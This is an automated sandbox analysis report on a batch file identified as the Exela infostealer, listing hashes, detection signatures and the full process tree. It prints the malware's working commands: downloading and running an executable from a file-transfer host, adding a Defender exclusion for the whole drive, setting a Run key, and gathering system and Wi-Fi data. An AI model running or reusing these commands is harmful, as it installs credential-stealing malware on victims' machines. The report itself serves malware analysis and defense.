Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 13:50
Static task
static1
Behavioral task
behavioral1
Sample
Bat Ayar.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Bat Ayar.bat
Resource
win10v2004-20240426-en
General
-
Target
Bat Ayar.bat
-
Size
684B
-
MD5
26bfcd76c6d78dccdf22716f13087ec6
-
SHA1
07e02f656c097569c29f7d01e76632d0b90fd3d9
-
SHA256
6eba1ec75ca86382fddebdca5e2ac3c00e0793af58ff74b9e9042f7297cbb214
-
SHA512
0696ec540605451d7888840c9e59a4711a6585302f8f69a3c3032aba72c689ca087918fe1c4f96e6943689f5f21178be68711980db8eb19f12dfe29854bbfeb9
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 34 4156 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3888 powershell.exe 4156 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 4992 netsh.exe 392 netsh.exe 4336 netsh.exe 2800 netsh.exe -
Deletes itself 1 IoCs
Processes:
Discord.exepid process 2740 Discord.exe -
Executes dropped EXE 4 IoCs
Processes:
Discord.exeDiscord.exeDiscord.exeDiscord.exepid process 5012 Discord.exe 2740 Discord.exe 4744 Discord.exe 4380 Discord.exe -
Loads dropped DLL 62 IoCs
Processes:
Discord.exeDiscord.exepid process 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 2740 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe 4380 Discord.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI50122\python310.dll upx behavioral2/memory/2740-93-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\select.pyd upx behavioral2/memory/2740-104-0x00007FFC0BC80000-0x00007FFC0BC8F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_sqlite3.pyd upx behavioral2/memory/2740-121-0x00007FFBF3CE0000-0x00007FFBF3E51000-memory.dmp upx behavioral2/memory/2740-120-0x00007FFC02C10000-0x00007FFC02C2F000-memory.dmp upx behavioral2/memory/2740-119-0x00007FFC02C30000-0x00007FFC02C5D000-memory.dmp upx behavioral2/memory/2740-118-0x00007FFC02C60000-0x00007FFC02C79000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_bz2.pyd upx behavioral2/memory/2740-109-0x00007FFC032B0000-0x00007FFC032BD000-memory.dmp upx behavioral2/memory/2740-108-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp upx behavioral2/memory/2740-103-0x00007FFC02C80000-0x00007FFC02CA4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\libssl-1_1.dll upx behavioral2/memory/2740-125-0x00007FFC02BE0000-0x00007FFC02C0E000-memory.dmp upx behavioral2/memory/2740-131-0x00007FFBF2A40000-0x00007FFBF2DB5000-memory.dmp upx behavioral2/memory/2740-130-0x00007FFBF4EE0000-0x00007FFBF4F98000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_asyncio.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_overlapped.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\multidict\_multidict.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\yarl\_quoting_c.cp310-win_amd64.pyd upx behavioral2/memory/2740-150-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_helpers.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_writer.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_websocket.cp310-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\frozenlist\_frozenlist.cp310-win_amd64.pyd upx behavioral2/memory/2740-168-0x00007FFC028E0000-0x00007FFC028F7000-memory.dmp upx behavioral2/memory/2740-167-0x00007FFC00540000-0x00007FFC0055E000-memory.dmp upx behavioral2/memory/2740-166-0x00007FFC02B90000-0x00007FFC02B9A000-memory.dmp upx behavioral2/memory/2740-165-0x00007FFC00750000-0x00007FFC00761000-memory.dmp upx behavioral2/memory/2740-164-0x00007FFBF4E90000-0x00007FFBF4EDC000-memory.dmp upx behavioral2/memory/2740-163-0x00007FFC008D0000-0x00007FFC008E9000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_uuid.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_parser.cp310-win_amd64.pyd upx behavioral2/memory/2740-149-0x00007FFBF3BC0000-0x00007FFBF3CD8000-memory.dmp upx behavioral2/memory/2740-148-0x00007FFC02A40000-0x00007FFC02A54000-memory.dmp upx behavioral2/memory/2740-147-0x00007FFC02BA0000-0x00007FFC02BB4000-memory.dmp upx behavioral2/memory/2740-146-0x00007FFC030A0000-0x00007FFC030B0000-memory.dmp upx behavioral2/memory/2740-145-0x00007FFC02BC0000-0x00007FFC02BD5000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\cryptography\hazmat\bindings\_rust.pyd upx behavioral2/memory/2740-171-0x00007FFBF2340000-0x00007FFBF2A34000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50122\_cffi_backend.cp310-win_amd64.pyd upx behavioral2/memory/2740-174-0x00007FFBF4E50000-0x00007FFBF4E88000-memory.dmp upx behavioral2/memory/2740-173-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp upx behavioral2/memory/2740-216-0x00007FFC07CB0000-0x00007FFC07CBD000-memory.dmp upx behavioral2/memory/2740-231-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp upx behavioral2/memory/2740-233-0x00007FFBF3CE0000-0x00007FFBF3E51000-memory.dmp upx behavioral2/memory/2740-234-0x00007FFBF2A40000-0x00007FFBF2DB5000-memory.dmp upx behavioral2/memory/2740-232-0x00007FFC02C10000-0x00007FFC02C2F000-memory.dmp upx behavioral2/memory/2740-271-0x00007FFC02BE0000-0x00007FFC02C0E000-memory.dmp upx behavioral2/memory/2740-268-0x00007FFBF2340000-0x00007FFBF2A34000-memory.dmp upx behavioral2/memory/2740-264-0x00007FFBF4E90000-0x00007FFBF4EDC000-memory.dmp upx behavioral2/memory/2740-263-0x00007FFC008D0000-0x00007FFC008E9000-memory.dmp upx behavioral2/memory/2740-262-0x00007FFC028E0000-0x00007FFC028F7000-memory.dmp upx behavioral2/memory/2740-261-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
Processes:
flow ioc 105 discord.com 70 discord.com 74 discord.com 104 discord.com 75 discord.com 102 discord.com 103 discord.com 106 discord.com 71 discord.com 72 discord.com 73 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 66 ip-api.com -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 2384 sc.exe 1468 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Anon\Discord.exe pyinstaller -
Collects information from the system 1 TTPs 2 IoCs
Uses WMIC.exe to find detailed system information.
-
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 3184 tasklist.exe 3048 tasklist.exe 4728 tasklist.exe 2400 tasklist.exe 5108 tasklist.exe 4348 tasklist.exe 4380 tasklist.exe 4304 tasklist.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEipconfig.exeNETSTAT.EXEipconfig.exepid process 3180 NETSTAT.EXE 3348 ipconfig.exe 1928 NETSTAT.EXE 3364 ipconfig.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 2804 systeminfo.exe 4816 systeminfo.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3888 powershell.exe 3888 powershell.exe 4156 powershell.exe 4156 powershell.exe 4284 powershell.exe 4284 powershell.exe 4284 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exeWMIC.exetasklist.exetasklist.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4380 tasklist.exe Token: SeIncreaseQuotaPrivilege 3124 WMIC.exe Token: SeSecurityPrivilege 3124 WMIC.exe Token: SeTakeOwnershipPrivilege 3124 WMIC.exe Token: SeLoadDriverPrivilege 3124 WMIC.exe Token: SeSystemProfilePrivilege 3124 WMIC.exe Token: SeSystemtimePrivilege 3124 WMIC.exe Token: SeProfSingleProcessPrivilege 3124 WMIC.exe Token: SeIncBasePriorityPrivilege 3124 WMIC.exe Token: SeCreatePagefilePrivilege 3124 WMIC.exe Token: SeBackupPrivilege 3124 WMIC.exe Token: SeRestorePrivilege 3124 WMIC.exe Token: SeShutdownPrivilege 3124 WMIC.exe Token: SeDebugPrivilege 3124 WMIC.exe Token: SeSystemEnvironmentPrivilege 3124 WMIC.exe Token: SeRemoteShutdownPrivilege 3124 WMIC.exe Token: SeUndockPrivilege 3124 WMIC.exe Token: SeManageVolumePrivilege 3124 WMIC.exe Token: 33 3124 WMIC.exe Token: 34 3124 WMIC.exe Token: 35 3124 WMIC.exe Token: 36 3124 WMIC.exe Token: SeIncreaseQuotaPrivilege 3124 WMIC.exe Token: SeSecurityPrivilege 3124 WMIC.exe Token: SeTakeOwnershipPrivilege 3124 WMIC.exe Token: SeLoadDriverPrivilege 3124 WMIC.exe Token: SeSystemProfilePrivilege 3124 WMIC.exe Token: SeSystemtimePrivilege 3124 WMIC.exe Token: SeProfSingleProcessPrivilege 3124 WMIC.exe Token: SeIncBasePriorityPrivilege 3124 WMIC.exe Token: SeCreatePagefilePrivilege 3124 WMIC.exe Token: SeBackupPrivilege 3124 WMIC.exe Token: SeRestorePrivilege 3124 WMIC.exe Token: SeShutdownPrivilege 3124 WMIC.exe Token: SeDebugPrivilege 3124 WMIC.exe Token: SeSystemEnvironmentPrivilege 3124 WMIC.exe Token: SeRemoteShutdownPrivilege 3124 WMIC.exe Token: SeUndockPrivilege 3124 WMIC.exe Token: SeManageVolumePrivilege 3124 WMIC.exe Token: 33 3124 WMIC.exe Token: 34 3124 WMIC.exe Token: 35 3124 WMIC.exe Token: 36 3124 WMIC.exe Token: SeDebugPrivilege 4304 tasklist.exe Token: SeDebugPrivilege 3184 tasklist.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeIncreaseQuotaPrivilege 4796 WMIC.exe Token: SeSecurityPrivilege 4796 WMIC.exe Token: SeTakeOwnershipPrivilege 4796 WMIC.exe Token: SeLoadDriverPrivilege 4796 WMIC.exe Token: SeSystemProfilePrivilege 4796 WMIC.exe Token: SeSystemtimePrivilege 4796 WMIC.exe Token: SeProfSingleProcessPrivilege 4796 WMIC.exe Token: SeIncBasePriorityPrivilege 4796 WMIC.exe Token: SeCreatePagefilePrivilege 4796 WMIC.exe Token: SeBackupPrivilege 4796 WMIC.exe Token: SeRestorePrivilege 4796 WMIC.exe Token: SeShutdownPrivilege 4796 WMIC.exe Token: SeDebugPrivilege 4796 WMIC.exe Token: SeSystemEnvironmentPrivilege 4796 WMIC.exe Token: SeRemoteShutdownPrivilege 4796 WMIC.exe Token: SeUndockPrivilege 4796 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeDiscord.exeDiscord.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3512 wrote to memory of 2756 3512 cmd.exe curl.exe PID 3512 wrote to memory of 2756 3512 cmd.exe curl.exe PID 3512 wrote to memory of 1104 3512 cmd.exe cacls.exe PID 3512 wrote to memory of 1104 3512 cmd.exe cacls.exe PID 3512 wrote to memory of 3888 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 3888 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 4156 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 4156 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 5012 3512 cmd.exe Discord.exe PID 3512 wrote to memory of 5012 3512 cmd.exe Discord.exe PID 5012 wrote to memory of 2740 5012 Discord.exe Discord.exe PID 5012 wrote to memory of 2740 5012 Discord.exe Discord.exe PID 2740 wrote to memory of 3348 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3348 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3896 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3896 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3888 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3888 2740 Discord.exe cmd.exe PID 3896 wrote to memory of 3124 3896 cmd.exe WMIC.exe PID 3896 wrote to memory of 3124 3896 cmd.exe WMIC.exe PID 3888 wrote to memory of 4380 3888 cmd.exe tasklist.exe PID 3888 wrote to memory of 4380 3888 cmd.exe tasklist.exe PID 2740 wrote to memory of 3992 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3992 2740 Discord.exe cmd.exe PID 3992 wrote to memory of 2744 3992 cmd.exe attrib.exe PID 3992 wrote to memory of 2744 3992 cmd.exe attrib.exe PID 2740 wrote to memory of 4820 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 4820 2740 Discord.exe cmd.exe PID 4820 wrote to memory of 4308 4820 cmd.exe reg.exe PID 4820 wrote to memory of 4308 4820 cmd.exe reg.exe PID 2740 wrote to memory of 4796 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 4796 2740 Discord.exe cmd.exe PID 4796 wrote to memory of 4304 4796 cmd.exe tasklist.exe PID 4796 wrote to memory of 4304 4796 cmd.exe tasklist.exe PID 2740 wrote to memory of 3048 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3048 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3652 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 3652 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 4808 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 4808 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 5084 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 5084 2740 Discord.exe cmd.exe PID 3652 wrote to memory of 4744 3652 cmd.exe cmd.exe PID 3652 wrote to memory of 4744 3652 cmd.exe cmd.exe PID 3048 wrote to memory of 2852 3048 cmd.exe cmd.exe PID 3048 wrote to memory of 2852 3048 cmd.exe cmd.exe PID 4808 wrote to memory of 3184 4808 cmd.exe tasklist.exe PID 4808 wrote to memory of 3184 4808 cmd.exe tasklist.exe PID 2852 wrote to memory of 3696 2852 cmd.exe chcp.com PID 2852 wrote to memory of 3696 2852 cmd.exe chcp.com PID 4744 wrote to memory of 3128 4744 cmd.exe chcp.com PID 4744 wrote to memory of 3128 4744 cmd.exe chcp.com PID 5084 wrote to memory of 4284 5084 cmd.exe powershell.exe PID 5084 wrote to memory of 4284 5084 cmd.exe powershell.exe PID 2740 wrote to memory of 1600 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 1600 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 2080 2740 Discord.exe cmd.exe PID 2740 wrote to memory of 2080 2740 Discord.exe cmd.exe PID 1600 wrote to memory of 2804 1600 cmd.exe systeminfo.exe PID 1600 wrote to memory of 2804 1600 cmd.exe systeminfo.exe PID 2080 wrote to memory of 3124 2080 cmd.exe netsh.exe PID 2080 wrote to memory of 3124 2080 cmd.exe netsh.exe PID 1600 wrote to memory of 4304 1600 cmd.exe HOSTNAME.EXE PID 1600 wrote to memory of 4304 1600 cmd.exe HOSTNAME.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bat Ayar.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent -o "C:\Users\Admin\AppData\Local\x.bat" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/807f63b2-f4f1-47e6-be8c-c81768b31a33/2241243d-65c3-489d-a4f1-8aab4534313a?temp_url_sig=8810de06efeeef271a4a696e3d87f4220a010c48c7eb331723b024c7526e7193&temp_url_expires=1716414925409&filename=x.bat"2⤵
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c A"d"d-MpP"r"efe"r"ence -ExclusionPath "C:\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "I"n"v"o"k"e"-W"e"b"r"e"q"u"e"st 'https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/da16ca16-b253-4073-9d27-a0f73970cb38/5706b294-04be-4fe4-b0d1-0faa703891f2?temp_url_sig=90553fd6b593455748cd8c42d5514517cb3bcda7c7cee3baa65de43cc7d47bed&temp_url_expires=1716414897486&filename=Exela.exe' -O"u"t"F"i"l"e Discord.exe"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe3⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f5⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername5⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet user5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user6⤵
-
C:\Windows\system32\query.exequery user5⤵
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"6⤵
-
C:\Windows\system32\net.exenet localgroup5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup6⤵
-
C:\Windows\system32\net.exenet localgroup administrators5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators6⤵
-
C:\Windows\system32\net.exenet user guest5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest6⤵
-
C:\Windows\system32\net.exenet user administrator5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command5⤵
-
C:\Windows\system32\tasklist.exetasklist /svc5⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
-
C:\Windows\system32\ROUTE.EXEroute print5⤵
-
C:\Windows\system32\ARP.EXEarp -a5⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano5⤵
- Gathers network information
-
C:\Windows\system32\sc.exesc query type= service state= all5⤵
- Launches sc.exe
-
C:\Windows\system32\netsh.exenetsh firewall show state5⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall show config5⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Anon\Discord.exe"C:\Users\Admin\AppData\Local\Anon\Discord.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Anon\Discord.exe"C:\Users\Admin\AppData\Local\Anon\Discord.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵
-
C:\Windows\system32\chcp.comchcp5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵
-
C:\Windows\system32\chcp.comchcp5⤵
-
